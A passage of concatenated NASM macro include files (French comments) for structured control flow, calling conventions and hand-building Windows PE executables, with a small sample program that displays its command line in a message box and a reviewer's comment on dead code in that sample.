%rep %0-1
%rotate -1
Push %1
%endrep
Call FunctionCall_Address_Define
%if %0>1
%ifndef BYTE.INC_NO_00
%assign FunctionCallC_Assign (%0-1)*4
add esp,FunctionCallC_Assign
%undef BYTE.INC_TEMPORARY_REGISTER
%else
%ifdef BYTE.INC_TEMPORARY_REGISTER
%rep %0-1
pop BYTE.INC_TEMPORARY_REGISTER
%endrep
%else
Error FUNCTION,NO_00 => TEMPORARY_REGISTER
%endif
%endif
%endif
%endmacro
;FunctionCall nom fonction [,p1,...]
%macro FunctionCall 1-2+
%ifdef FunctionDefine_%1
%define FunctionCall_Address_Define @%1
%ifidni FunctionDefine_%1,Std
%if %0==1
FunctionCallStd %1
%else
FunctionCallStd %1,%2
%endif
%elifidni FunctionDefine_%1,Pascal
%if %0==1
FunctionCallPascal %1
%else
FunctionCallPascal %1,%2
%endif
%else
%if %0==1
FunctionCallC %1
%else
FunctionCallC %1,%2
%endif
%endif
%undef FunctionCall_Address_Define
%else
%if %0==1
Error FUNCTION,FunctionCall %1
%else
Error FUNCTION,FunctionCall %1,%2
%endif
%endif
%endmacro
%endif


@ -0,0 +1,328 @@
; MACROS FOR STRUCTURATED PROGRAMMING v0.9a
; =========================================
;Continue
;Break
;IfJmp {valeur1},condition,valeur2,l [,-1|+1]
;IfNotJmp {valeur1},condition,valeur2,l [,-1|+1]
;If {valeur1},condition,valeur2
;IfX condition asm
; ...
;[Else]
; [...]
;EndIf
;Switch v
;Case v1
;...
;[Default]
; [...]
;EndSwitch
; les conditions Case sont évaluées juste avant leur exécution, à la
; différence du C !!!
;While [{valeur1},condition,valeur2]
; ...
;EndWhile [{valeur1},condition,valeur2]
;Until [{valeur1},condition,valeur2]
; ...
;EndUntil [{valeur1},condition,valeur2]
;For compteur,valeur_début,condition,valeur_fin,valeur_incrément
; ...
;EndFor
;================================= General ===================================
%ifndef _LANGUAGE.INC
%define _LANGUAGE.INC
%include "byte.inc"
;============================= Continue-Break ================================
%macro Continue 0
%ifdef %$BeginEnd
Jmp %$Begin,-1
%elifdef %$$BeginEnd
Jmp %$$Begin,-1
%elifdef %$$$BeginEnd
Jmp %$$$Begin,-1
%elifdef %$$$$BeginEnd
Jmp %$$$$Begin,-1
%elifdef %$$$$$BeginEnd
Jmp %$$$$$Begin,-1
%elifdef %$$$$$$BeginEnd
Jmp %$$$$$$Begin,-1
%elifdef %$$$$$$$BeginEnd
Jmp %$$$$$$$Begin,-1
%elifdef %$$$$$$$$BeginEnd
Jmp %$$$$$$$$Begin,-1
%elifdef %$$$$$$$$$BeginEnd
Jmp %$$$$$$$$$Begin,-1
%elifdef %$$$$$$$$$$BeginEnd
Jmp %$$$$$$$$$$Begin,-1
%else
Error LANGUAGE,Continue => 10 blocs maximum
%endif
%endmacro
%macro Break 0
%ifdef %$BeginEnd
Jmp %$End,+1
%elifdef %$$BeginEnd
Jmp %$$End,+1
%elifdef %$$$BeginEnd
Jmp %$$$End,+1
%elifdef %$$$$BeginEnd
Jmp %$$$$End,+1
%elifdef %$$$$$BeginEnd
Jmp %$$$$$End,+1
%elifdef %$$$$$$BeginEnd
Jmp %$$$$$$End,+1
%elifdef %$$$$$$$BeginEnd
Jmp %$$$$$$$End,+1
%elifdef %$$$$$$$$BeginEnd
Jmp %$$$$$$$$End,+1
%elifdef %$$$$$$$$$BeginEnd
Jmp %$$$$$$$$$End,+1
%elifdef %$$$$$$$$$$BeginEnd
Jmp %$$$$$$$$$$End,+1
%else
Error LANGUAGE,Break => 10 blocs maximum
%endif
%endmacro
;==================================== If =====================================
%macro IfJmp 4+
MultiParams %1
%if MultiParams_Ret==1
Cmp %1,%3
%else
%1
Cmp eax,%3
%endif
%ifidni %2,==
JX e,%4
%elifidni %2,!=
JX ne,%4
%elifidni %2,<
JX b,%4
%elifidni %2,>
JX a,%4
%elifidni %2,<=
JX be,%4
%elifidni %2,>=
JX ae,%4
%else
Error LANGUAGE,IfJmp v1,condition,v2,label
%endif
%endmacro
%macro IfNotJmp 4+
MultiParams %1
%if MultiParams_Ret==1
Cmp %1,%3
%else
%1
Cmp eax,%3
%endif
%ifidni %2,==
JX ne,%4
%elifidni %2,!=
JX e,%4
%elifidni %2,<
JX ae,%4
%elifidni %2,>
JX be,%4
%elifidni %2,<=
JX a,%4
%elifidni %2,>=
JX b,%4
%else
Error LANGUAGE,IfNotJmp v1,condition,v2,label
%endif
%endmacro
%macro If 3
%push If
MultiParams %1
%if MultiParams_Ret==1
IfNotJmp %1,%2,%3,%$If_Not,+1
%else
IfNotJmp {%1},%2,%3,%$If_Not,+1
%endif
%endmacro
%macro IfX 1
%push If
JnX %1,%$If_Not,+1
%endmacro
%macro Else 0
%ifctx If
Jmp %$If_End,+1
%$If_Not:
%repl Else
%else
Error LANGUAGE,Else => If | IfX
%endif
%endmacro
%macro EndIf 0
%ifctx If
%$If_Not:
%pop
%elifctx Else
%$If_End:
%pop
%else
Error LANGUAGE,EndIf => If | IfX | Else
%endif
%endmacro
;================================== Switch ===================================
%macro Switch 1
%push Switch
%define %$BeginEnd
%define %$Switch_V_Define %1
%$Begin:
%endmacro
%macro Case 1
%ifdef %$Switch_NeedEndIf_Define
EndIf
%endif
%ifctx Switch
If %$Switch_V_Define,==,%1
%define %$Switch_NeedEndIf_Define
%else
Error LANGUAGE,Case => Switch
%endif
%endmacro
%macro Default 0
%ifdef %$Switch_NeedEndIf_Define
EndIf
%endif
%ifctx Switch
%else
Error LANGUAGE,Default => Switch
%endif
%endmacro
%macro EndSwitch 0
%ifdef %$Switch_NeedEndIf_Define
EndIf
%endif
%ifctx Switch
%$End:
%pop
%else
Error LANGUAGE,EndSwitch => Switch
%endif
%endmacro
;================================== While ====================================
%macro While 0-3
%push While
%define %$BeginEnd
%$Begin:
%if %0!=0
MultiParams %1
%if MultiParams_Ret==1
IfNotJmp %1,%2,%3,%$End,+1
%else
IfNotJmp {%1},%2,%3,%$End,+1
%endif
%endif
%endmacro
%macro EndWhile 0-3
%ifctx While
%if %0!=0
MultiParams %1
%if MultiParams_Ret==1
IfJmp %1,%2,%3,%$Begin,-1
%else
IfJmp {%1},%2,%3,%$Begin,-1
%endif
%else
Continue
%endif
%$End:
%pop
%else
Error LANGUAGE,EndWhile => While
%endif
%endmacro
;================================== Until ====================================
%macro Until 0-3
%push Until
%define %$BeginEnd
%$Begin:
%if %0!=0
MultiParams %1
%if MultiParams_Ret==1
IfJmp %1,%2,%3,%$End,+1
%else
IfJmp {%1},%2,%3,%$End,+1
%endif
%endif
%endmacro
%macro EndUntil 0-3
%ifctx Until
%if %0!=0
MultiParams %1
%if MultiParams_Ret==1
IfNotJmp %1,%2,%3,%$Begin,-1
%else
IfNotJmp {%1},%2,%3,%$Begin,-1
%endif
%else
Continue
%endif
%$End:
%pop
%else
Error LANGUAGE,EndUntil => Until
%endif
%endmacro
;=================================== For =====================================
%macro For 5
%push For
%define %$BeginEnd
%define %$For_1_Define %1
%define %$For_5_Define %5
Mov %1,%2
%$Begin:
MultiParams %1
%if MultiParams_Ret==1
IfNotJmp %1,%3,%4,%$End,+1
%else
IfNotJmp {%1},%3,%4,%$End,+1
%endif
%endmacro
%macro EndFor 0
%ifctx For
%if %$For_5_Define>0
Add %$For_1_Define,%$For_5_Define
%elif %$For_5_Define<0
Sub %$For_1_Define,-%$For_5_Define
%else
%endif
Continue
%$End:
%pop
%else
Error LANGUAGE,EndFor => For
%endif
%endmacro
%endif


@ -0,0 +1,54 @@
; GENERAL MACROS FOR NASM v1.0a
; =============================
;NASM.INC_NO_WARNING => ne pas afficher les warnings utilisateurs
;Error include(sans .INC),message
;Warning include(sans .INC),message
;MultiParams p
; -> MultiParams_Ret = nombre de paramètres
;================================= General ===================================
%ifndef _NASM.INC
%define _NASM.INC
%push _NASM.INC ;pour éviter erreurs %ifctx
%macro NASM.INC 0
%undef NASM.INC_NO_WARNING
%assign ErrorWarning_Assign 0
%endmacro
%macro NASM.INC~ 0
NASM.INC
%endmacro
NASM.INC
%macro Error 2+
ErrorWarningNext
%error %1.INC error: %2
%endmacro
%macro Warning 2+
%ifndef NASM.INC_NO_WARNING
ErrorWarningNext
%error %1.INC warning: %2
%endif
%endmacro
%macro ErrorWarningNext 0
%assign ErrorWarning_Assign ErrorWarning_Assign+1
%if ErrorWarning_Assign==1
%error ===============================================
%endif
%endmacro
%macro MultiParams 1-*
%define MultiParams_Ret %0
%endmacro
%endif


@ -0,0 +1,112 @@
; PE FILE STRUCTURE
; =================
%include "pe.inc"
BIN_Begin
MZHeader
MZExtendedHeader
MZSection.text_Begin
push cs
pop ds
mov dx,MZSection.text_VA(text_string)
mov ah,09
int 21h
mov ax,4C01h
int 21h
text_string: db 'This program cannot be run in DOS mode.',0Dh,0Ah,'$'
MZSection.text_End
PEHeader
%define PEOptionalheader_EipRVA PESection.text_RVA(mondebut)
PEOptionalHeader_Begin
PEOptionalHeader_Directory Export,0,0
PEOptionalHeader_Directory Import,Import_Directorys_RVA,Import_Directorys_VS
; PEOptionalHeader_Directory Resource,0,0
; PEOptionalHeader_Directory Exception,0,0
; PEOptionalHeader_Directory Security,0,0
; PEOptionalHeader_Directory Relocations,0,0
; PEOptionalHeader_Directory Debug,0,0
; PEOptionalHeader_Directory ImageDescription,0,0
; PEOptionalHeader_Directory MachineSpecific,0,0
; PEOptionalHeader_Directory ThreadLocalStorage,0,0
PEOptionalHeader_End
PESectionHeader .text,'.text',PESectionHeader_Flags_EXECUTABLECODE | PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_EXECUTEACCESS | PESectionHeader_Flags_READACCESS
PESectionHeader .rdata,'.rdata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
PESectionHeader .data,'.data',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
PESectionHeader .bss,'.bss', PESectionHeader_Flags_DATA0 | PESectionHeader_Flags_READACCESS | PESectionHeader_Flags_WRITEACCESS
PESectionHeader .idata,'.idata',PESectionHeader_Flags_DATAFROMFILE | PESectionHeader_Flags_READACCESS
PESections_Begin
PESection.text_Begin
int 03h
mondebut:
MB_OK equ 0
mov eax,MB_OK
push eax
mov eax,PESection.rdata_VA(message)
call [GetCommandLineA]
push eax
push eax
mov eax,0
push eax
call [MessageBoxA]
call [PESection.idata_VA(Import.KERNEL32.ExitProcess)]
mov [PESection.text_VA(text1)],eax
mov [PESection.rdata_VA(rdata1)],ebx
mov [PESection.data_VA(data1)],ecx
mov [PESection.bss_VA(bss1)],edx
text1:
jmp short mondebut
PESection.text_End
PESection.rdata_Begin
message: db "coucou",0
rdata1: times 1001h db 22h ;db 'data1'
PESection.rdata_End
PESection.data_Begin
data1: times 1205h db 0FEh
PESection.data_End
PESection.bss_Begin
bss1: resb 1001h
PESection.bss_End
PESection.idata_Begin
Import_Directorys_Begin .idata
Import_Directory KERNEL32
Import_Directory USER32
Import_Directorys_End
Import_RVAs_Begin KERNEL32
Import_RVA KERNEL32,GetCommandLineA
Import_RVA KERNEL32,ExitProcess
Import_RVAs_End
Import_RVAs_Begin USER32
Import_RVA USER32,MessageBoxA
Import_RVAs_End
Import_VAs_Begin KERNEL32
Import_VA KERNEL32,GetCommandLineA,0BFF8C5ACh
Import_VA KERNEL32,ExitProcess,0BFF8D4CAh
Import_VAs_End
Import_VAs_Begin USER32
Import_VA USER32,MessageBoxA
Import_VAs_End
Import_Strings_Begin KERNEL32
Import_String_Function KERNEL32,GetCommandLineA,"GetCommandLineA",0D0h
Import_String_Function KERNEL32,ExitProcess,"ExitProcess",07Fh
Import_String_Dll KERNEL32,"KERNEL32.DLL"
Import_Strings_End
Import_Strings_Begin USER32
Import_String_Function USER32,MessageBoxA,"MessageBoxA"
Import_String_Dll USER32,"USER32.DLL"
Import_Strings_End
PESection.idata_End
PESections_End
BIN_End
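Review bot: The `mov eax,PESection.rdata_VA(message)` at L1417 is dead code: the `call [GetCommandLineA]` on the next line overwrites eax before the two `push eax` at L1419–L1420, so MessageBoxA receives the command line as both text and caption and the `message` string defined at L1433 is never displayed. If showing the command line is the intent, drop L1417 and note that `message` only exists to exercise `PESection.rdata_VA()`; otherwise move the GetCommandLineA call ahead of the `mov`. The stores at L1425–L1428 sit after the ExitProcess call and are unreachable, and the ones into .text and .rdata would fault anyway given the section flags at L1405–L1406, so a comment such as `; never executed: only checks that every PESection.*_VA() resolves at assembly time` would make that deliberate rather than puzzling.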


@ -0,0 +1,654 @@
;corriger ;???
;raison inconnue ; ?
;gestion message d'erreur structures (%error)
; %define et %ifdef pour tester l'existence de header ncessaires
; (pour viter les erreurs de label indfinis)
;.edata,.rsrc (icones)
;supprimer macro Directories ? (calcul automatique ?)
; MACROS AND DEFINITIONS FOR PE FILES v1.0a
; =========================================
;By rix-shogun-agressor (erix@mail.dotcom.fr,rix@dreamnet.org)
;conventions:
;xxx_VA: adresse virtuelle (adresse en mmoire)
;xxx_RVA: dplacement d'adresse virtuel (offset d'adresse en mmoire%baseVA)
;xxx_VS: taille virtuelle (taille en mmoire)
;xxx_FS: taille fichier
;xxx_FA: adresse fichier (offset dans le fichier)
;xxx_Fa: file alignement
;xxx-Va: virtual alignement (alignement mmoire)
;xxx_Assign: assignation pour un calcul valu plus tard
;xxx_Define: definition pour un calcul valu plus tard dont une des valeurs
; est toujours inconnue
;xxx_Ifctx: macros pour regrouper plusieurs %ifctx
;xxx: valeur
;sections: text,
;macros de dfinitions des header: NOM[SousNom]_Begin NOM[SousNom]_End
; ou bien: NOM[SousNom]
;define de dfinitions des headers: NOM[SousNom]_Xxx
;definition de constantes des header: NOM[SousNom]_XXX
;nom interne aux macros NOMHeader NOM[SousNom]_Begin_FA NOM[SousNom]_End_FA
;MacroXXX:macros internes
;xxxx:normal
;xxxxa:align (V=>align virtuel,F=>align fichier)
;equ: valeur calcule d'aprŠs nombres suivants l'endroit de stockage
;%define: dclaration des constantes utilisables par l'utilisateur
;%assign: dclaration des variables internes pour les calculs d'equ (_Assign)
;================================= BIN Begin =================================
%ifndef PE.INC
%define PE.INC
%push PE.INC
%include "language.inc"
%macro BIN_Begin 0
SECTION .text
BIN_Begin_FA:
%push BIN_Begin
%endmacro
;================================= MZ Header =================================
%define MZHeader_MinimumMemory 0 ;en paragraphes, ajouter en fin de mmoire
%define MZHeader_MaximumMemory 0FFFFh ;en paragraphes, ajouter en fin de mmoire
%define MZHeader_Ss 0000h
%define MZHeader_Sp 00B8h ; ?
%define MZHeader_Ip 0000h
%define MZHeader_Cs 0000h
%macro MZHeader 0
%ifctx BIN_Begin
BITS 16
MZHeader_Begin_FA:
MZHeader_Signature_FA: db 'MZ'
MZHeader_LastPageBytes_FA: dw (BIN_End_FAa-BIN_Begin_FA) % 512
MZHeader_PagesNumber_FA: dw (BIN_End_FAa-BIN_Begin_FA)/512+1
MZHeader_RelocationsNumber_FA: dw 0
MZHeader_HeaderParagraphsNumber_FA: dw (MZExtendedHeader_End_FA-MZHeader_Begin_FA)/16
MZHeader_MinimumMemory_FA: dw MZHeader_MinimumMemory
MZHeader_MaximumMemory_FA: dw MZHeader_MaximumMemory
MZHeader_Ss_FA: dw MZHeader_Ss
MZHeader_Sp_FA: dw MZHeader_Sp
MZHeader_Checksum_FA: dw 0
MZHeader_Ip_FA: dw MZHeader_Ip
MZHeader_Cs_FA: dw MZHeader_Cs
MZHeader_RelocationTableFA_FA: dw 0040h ;0040h=>fichier PE
MZHeader_OverlayNumber_FA: dw 0
MZHeader_End_FA:
%repl MZHeader
%else
%error PE.INC error: MZHeader => BIN_Begin
%endif
%endmacro
;============================ MZ Extended Header =============================
%macro MZExtendedHeader 0
%ifctx MZHeader
MZExtendedHeader_Begin_FA:
dd 0
dw 0
%rep 26
db 0
%endrep
MZExtendedHeader_PEHeaderFA_FA: dd PEHeader_Begin_FA
MZExtendedHeader_End_FA:
%repl MZExtendedHeader
%else
%error PE.INC error: MZExtendedHeader => MZHeader
%endif
%endmacro
;================================== MZ Text ==================================
%macro MZSection.text_Begin 0
%ifctx MZExtendedHeader
MZSection.text_Begin_FA:
%define MZSection.text_VA(a) (a)-MZSection.text_Begin_FA
%repl MZSection.text_Begin
%else
%error PE.INC error: MZSection.text_Begin => MZExtendedHeader
%endif
%endmacro
%macro MZSection.text_End 0
%ifctx MZSection.text_Begin
MZSection.text_End_FA:
DbAlign MZSection.text_Begin_FA,16
MZSection.text_End_FAa:
%repl MZSection.text_End
%else
%error PE.INC error: MZSection.text_End => MZSection.text_Begin
%endif
%endmacro
;================================= PE Header =================================
%define PEHeader_Machine_386 14Ch
%define PEHeader_Machine_486 14Dh
%define PEHeader_Machine_PENTIUM 14Eh
%define PEHeader_Machine PEHeader_Machine_386
%define PEHeader_DateHour 0
%define PEHeader_OptionalHeaderFS 0E0h ; ?
%define PEHeader_Characteristics_NORELOCATIONS 0000000000000001b
%define PEHeader_Characteristics_EXECUTABLEIMAGE 0000000000000010b ;excutable/librairie
%define PEHeader_Characteristics_16B 0000000001000000b ;programme 16 bits
%define PEHeader_Characteristics_BYTESREVERSEDLOW 0000000010000000b
%define PEHeader_Characteristics_32B 0000000100000000b ;programme 32 bits
%define PEHeader_Characteristics_NODEBUGINFORMATIONS 0000001000000000b
%define PEHeader_Characteristics_SYSTEMFILE 0001000000000000b
%define PEHeader_Characteristics_DLL 0010000000000000b
%define PEHeader_Characteristics_BYTESREVERSEDHIGH 1000000000000000b
%define PEHeader_Characteristics PEHeader_Characteristics_NORELOCATIONS | PEHeader_Characteristics_EXECUTABLEIMAGE | PEHeader_Characteristics_32B
%macro PEHeader 0
%ifctx MZSection.text_End
BITS 32
PEHeader_Begin_FA:
PEHeader_Signature_FA: db 'PE',00h,00h
PEHeader_Machine_FA: dw PEHeader_Machine
PEHeader_SectionsNumber_FA: dw PEHeader_SectionsNumber
%assign PEHeader_SectionsNumber_Assign 0
PEHeader_DateHour_FA: dd PEHeader_DateHour
dd 0
dd 0
PEHeader_OptionalHeaderFS_FA: dw PEHeader_OptionalHeaderFS
PEHeader_Characteristics_FA: dw PEHeader_Characteristics
PEHeader_End_FA:
%define PESection_RVA(a) PESectionCur_RVAa_Assign+(a)-PESectionCur_FAa_Define
%define PESection.text_RVA(a) PESection.text_RVAa+(a)-PESection.text_Begin_FAa
%define PESection.rdata_RVA(a) PESection.rdata_RVAa+(a)-PESection.rdata_Begin_FAa
%define PESection.data_RVA(a) PESection.data_RVAa+(a)-PESection.data_Begin_FAa
%define PESection.bss_RVA(a) PESection.bss_RVAa+(a)-PESection.bss_Begin_FAa
%define PESection.idata_RVA(a) PESection.idata_RVAa+(a)-PESection.idata_Begin_FAa
%repl PEHeader
%else
%error PE.INC error: PEHeader => MZSection.text_End
%endif
%endmacro
;============================ PE Optional Header =============================
%define PEOptionalHeader_MajorLinkerVersion 0
%define PEOptionalHeader_MinorLinkerVersion 0
%define PEOptionalheader_EipRVA PESection.text_RVA(PESection.text_Begin_FAa)
%define PEOptionalHeader_ImageVAa 00400000h
%define PEOptionalHeader_Va 1000h
%define PEOptionalHeader_Fa 200h
%define PEOptionalHeader_MajorOSVersion 4
%define PEOptionalHeader_MinorOSVersion 0
%define PEOptionalHeader_MajorProgramVersion 0
%define PEOptionalHeader_MinorProgramVersion 0
%define PEOptionalHeader_MajorSubSystemVersion 4
%define PEOptionalHeader_MinorSubSystemVersion 0
%define PEOptionalHeader_SubSystem_DRIVER 1
%define PEOptionalHeader_SubSystem_GUI 2
%define PEOptionalHeader_SubSystem_CONSOLE 3
%define PEOptionalHeader_SubSystem_POSIX 7
%define PEOptionalHeader_SubSystem PEOptionalHeader_SubSystem_GUI
%define PEOptionalHeader_DllFlags_NOTIFYPROCESSATTACHMENTS 0001b
%define PEOptionalHeader_DllFlags_NOTIFYPROCESSDETACHMENTS 0010b
%define PEOptionalHeader_DllFlags_NOTIFYTHREADSATTACHMENTS 0100b
%define PEOptionalHeader_DllFlags_NOTIFYTHREADSDETACHMENTS 1000b
%define PEOptionalHeader_DllFlags 0
%define PEOptionalHeader_ReservedStackVSa 0
%define PEOptionalHeader_CommittedStackVSa 0
%define PEOptionalHeader_ReservedHeapVSa 0
%define PEOptionalHeader_CommittedHeapVSa 0
%macro PEOptionalHeader_Begin 0
%ifctx PEHeader
PEOptionalHeader_Begin_FA:
PEOptionalHeader_Signature_FA: db 0Bh,01h
PEOptionalHeader_MajorLinkerVersion_FA: db PEOptionalHeader_MajorLinkerVersion
PEOptionalHeader_MinorLinkerVersion_FA: db PEOptionalHeader_MinorLinkerVersion
PEOptionalHeader_CodeFSa_FA: dd PESection.text_FSa
PEOptionalHeader_InitializedDataFSa_FA: dd PEOptionalHeader_InitializedDataFSa
%assign PEOptionalHeader_InitializedDataFSa_Assign 0
PEOptionalHeader_UninitializedDataVSa_FA: dd PESection.bss_VSa
PEOptionalHeader_EipRVA_FA: dd PEOptionalheader_EipRVA
PEOptionalHeader_CodeRVAa_FA: dd PESection.text_RVAa
%assign PEOptionalHeader_DataRVAa_Assign 0
PEOptionalHeader_DataRVAa_FA: dd PEOptionalHeader_DataRVAa ; ?
PEOptionalHeader_ImageVAa_FA: dd PEOptionalHeader_ImageVAa
PEOptionalHeader_Va_FA: dd PEOptionalHeader_Va
PEOptionalHeader_Fa_FA: dd PEOptionalHeader_Fa
PEOptionalHeader_MajorOSVersion_FA: dw PEOptionalHeader_MajorOSVersion
PEOptionalHeader_MinorOSVersion_FA: dw PEOptionalHeader_MinorOSVersion
PEOptionalHeader_MajorProgramVersion_FA: dw PEOptionalHeader_MajorProgramVersion
PEOptionalHeader_MinorProgramVersion_FA: dw PEOptionalHeader_MinorProgramVersion
PEOptionalHeader_MajorSubSystemVersion_FA: dw PEOptionalHeader_MajorSubSystemVersion
PEOptionalHeader_MinorSubSystemVersion_FA: dw PEOptionalHeader_MinorSubSystemVersion
dd 0
PEOptionalHeader_ImageVSa_FA: dd PEOptionalHeader_ImageVSa
PEOptionalHeader_HeadersFSa_FA: dd PESections_Begin_FAa-BIN_Begin_FA
PEOptionalHeader_Checksum_FA: dd 0
PEOptionalHeader_SubSystem_FA: dw PEOptionalHeader_SubSystem
PEOptionalHeader_DllFlags_FA: dw PEOptionalHeader_DllFlags
PEOptionalHeader_ReservedStackVSa_FA: dd PEOptionalHeader_ReservedStackVSa ;???
PEOptionalHeader_CommittedStackVSa_FA: dd PEOptionalHeader_CommittedStackVSa ;???
PEOptionalHeader_ReservedHeapVSa_FA: dd PEOptionalHeader_ReservedHeapVSa ;???
PEOptionalHeader_CommittedHeapVSa_FA: dd PEOptionalHeader_CommittedHeapVSa ;???
dd 0
PEOptionalHeader_DirectoriesNumber_FA: dd PEOptionalHeader_DirectoriesNumber
%assign PEOptionalHeader_DirectoriesNumber_Assign 0
%repl PEOptionalHeader_Begin
%else
%error PE.INC error: PEOptionalHeader_Begin => PEHeader
%endif
%endmacro
;PEOptionalHeader_Directory name,RVA,FS
%macro PEOptionalHeader_Directory 3
%ifctx PEOptionalHeader_Begin
PEOptionalHeader%1RVA_FA: dd %2
PEOptionalHeader%1FS_FA: dd %3
%assign PEOptionalHeader_DirectoriesNumber_Assign PEOptionalHeader_DirectoriesNumber_Assign+1
%else
%error PE.INC error: PEOptionalHeader_Directory => PEOptionalHeader_Begin
%endif
%endmacro
%macro PEOptionalHeader_End 0
%ifctx PEOptionalHeader_Begin
PEOptionalHeader_End_FA:
DbAlign PEOptionalHeader_Begin_FA,PEHeader_OptionalHeaderFS
PEOptionalHeader_End_FAa:
PEOptionalHeader_DirectoriesNumber equ PEOptionalHeader_DirectoriesNumber_Assign
%repl PEOptionalHeader_End
%else
%error PE.INC error: PEOptionalHeader_End => PEOptionalHeader_Begin
%endif
%endmacro
;============================= PE Section Header =============================
%define PESectionHeader_Flags_EXECUTABLECODE 00000000000000000000000000100000b
%define PESectionHeader_Flags_DATAFROMFILE 00000000000000000000000001000000b
%define PESectionHeader_Flags_DATA0 00000000000000000000000010000000b
%define PESectionHeader_Flags_COMMENTS 00000000000000000000001000000000b
%define PESectionHeader_Flags_COMMONBLOCKDATA 00000000000000000001000000000000b
%define PESectionHeader_Flags_FARDATA 00000000000000001000000000000000b
%define PESectionHeader_Flags_PURGEABLEDATA 00000000000000100000000000000000b
%define PESectionHeader_Flags_NONMOVABLEDATA 00000000000001000000000000000000b
%define PESectionHeader_Flags_SHAREDINSTANCES 00010000000000000000000000000000b ;.text
%define PESectionHeader_Flags_EXECUTEACCESS 00100000000000000000000000000000b
%define PESectionHeader_Flags_READACCESS 01000000000000000000000000000000b
%define PESectionHeader_Flags_WRITEACCESS 10000000000000000000000000000000b
;PESectionHeader .name,'.name',flags
%macro PESectionHeader 3
%ifctx PEOptionalHeader_End
PESectionHeader%1_Name_FA: db %2
DbAlign PESectionHeader%1_Name_FA,8
PESectionHeader%1_VS_FA: dd PESection%1_VS
PESectionHeader%1_RVAa_FA: dd PESection%1_RVAa
PESectionHeader%1_FSa_FA: dd PESection%1_FSa
PESectionHeader%1_FAa_FA: dd PESectionHeader%1_FAa
dd 0
dd 0
dw 0
dw 0
PESectionHeader%1_Flags_FA: dd %3
%else
%error PE.INC error: PESectionHeader => PEOptionalHeader_End
%endif
%endmacro
;================================ PE Sections ================================
%macro PESections_Begin 0
%ifctx PEOptionalHeader_End
PESections_Begin_FA:
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
PESections_Begin_FAa:
%assign PESectionPrec_FSa_Assign PESections_Begin_FAa-BIN_Begin_FA
%assign PESectionPrec_RVAa_Assign 0
%assign PESectionCur_RVAa_Assign 0
%define PESectionCur_FAa_Define 0
;impossible dans MacroPESection_Begin
%define PESection_VA(a) PEOptionalHeader_ImageVAa+PESectionCur_RVAa_Assign+(a)-PESectionCur_FAa_Define
%define PESection.text_VA(a) PEOptionalHeader_ImageVAa+PESection.text_RVAa+(a)-PESection.text_Begin_FAa
%define PESection.rdata_VA(a) PEOptionalHeader_ImageVAa+PESection.rdata_RVAa+(a)-PESection.rdata_Begin_FAa
%define PESection.data_VA(a) PEOptionalHeader_ImageVAa+PESection.data_RVAa+(a)-PESection.data_Begin_FAa
%define PESection.bss_VA(a) PEOptionalHeader_ImageVAa+PESection.bss_RVAa+(a)-PESection.bss_Begin_FAa
%define PESection.idata_VA(a) PEOptionalHeader_ImageVAa+PESection.idata_RVAa+(a)-PESection.idata_Begin_FAa
%repl PESections_Begin
%else
%error PE.INC error: PESections_Begin => PEOptionalHeader
%endif
%endmacro
;MacroPESection_End .name
%macro MacroPESection_End 1
PESection%1_End_FA:
DbAlign BIN_Begin_FA,PEOptionalHeader_Fa
PESection%1_End_FAa:
%assign PEHeader_SectionsNumber_Assign PEHeader_SectionsNumber_Assign+1
PESection%1_VS equ PESection%1_End_FA-PESection%1_Begin_FAa
%endmacro
%macro PESection.text_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.text_Begin_FAa:
%define PESectionCur_FAa_Define PESection.text_Begin_FAa
%push PESection.text_Begin
%else
%error PE.INC error: PESection.text_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.text_End 0
%ifctx PESection.text_Begin
MacroPESection_End .text
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.text_RVAa equ PESectionPrec_RVAa_Assign
PESection.text_FSa equ PESection.text_End_FAa-PESection.text_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.text_FSa
PESectionHeader.text_FAa equ PESection.text_Begin_FAa
%pop
%else
%error PE.INC error: PESection.text_End => PESection.text_Begin
%endif
%endmacro
%macro PESection.rdata_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.rdata_Begin_FAa:
%define PESectionCur_FAa_Define PESection.rdata_Begin_FAa
%push PESection.rdata_Begin
%else
%error PE.INC error: PESection.rdata_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.rdata_End 0
%ifctx PESection.rdata_Begin
MacroPESection_End .rdata
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.rdata_RVAa equ PESectionPrec_RVAa_Assign
PESection.rdata_FSa equ PESection.rdata_End_FAa-PESection.rdata_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.rdata_FSa
PESectionHeader.rdata_FAa equ PESection.rdata_Begin_FAa
%assign PEOptionalHeader_InitializedDataFSa_Assign PEOptionalHeader_InitializedDataFSa_Assign+PESection.rdata_FSa
%if PEOptionalHeader_DataRVAa_Assign == 0
%assign PEOptionalHeader_DataRVAa_Assign PESection.rdata_RVAa
%endif
%pop
%else
%error PE.INC error: PESection.rdata_End => PESection.rdata_Begin
%endif
%endmacro
%macro PESection.data_Begin 0
%ifctx PESections_Begin
%assign PESectionCur_RVAa_Assign (((PESectionPrec_RVAa_Assign+PESectionPrec_FSa_Assign-1)/PEOptionalHeader_Va)+1)*PEOptionalHeader_Va
PESection.data_Begin_FAa:
%define PESectionCur_FAa_Define PESection.data_Begin_FAa
%push PESection.data_Begin
%else
%error PE.INC error: PESection.data_Begin => PESections_Begin
%endif
%endmacro
%macro PESection.data_End 0
%ifctx PESection.data_Begin
MacroPESection_End .data
%assign PESectionPrec_RVAa_Assign PESectionCur_RVAa_Assign
PESection.data_RVAa equ PESectionPrec_RVAa_Assign
PESection.data_FSa equ PESection.data_End_FAa-PESection.data_Begin_FAa
PESectionHeader.data_FAa equ PESection.data_Begin_FAa
%assign PESectionPrec_FSa_Assign PESection.data_FSa
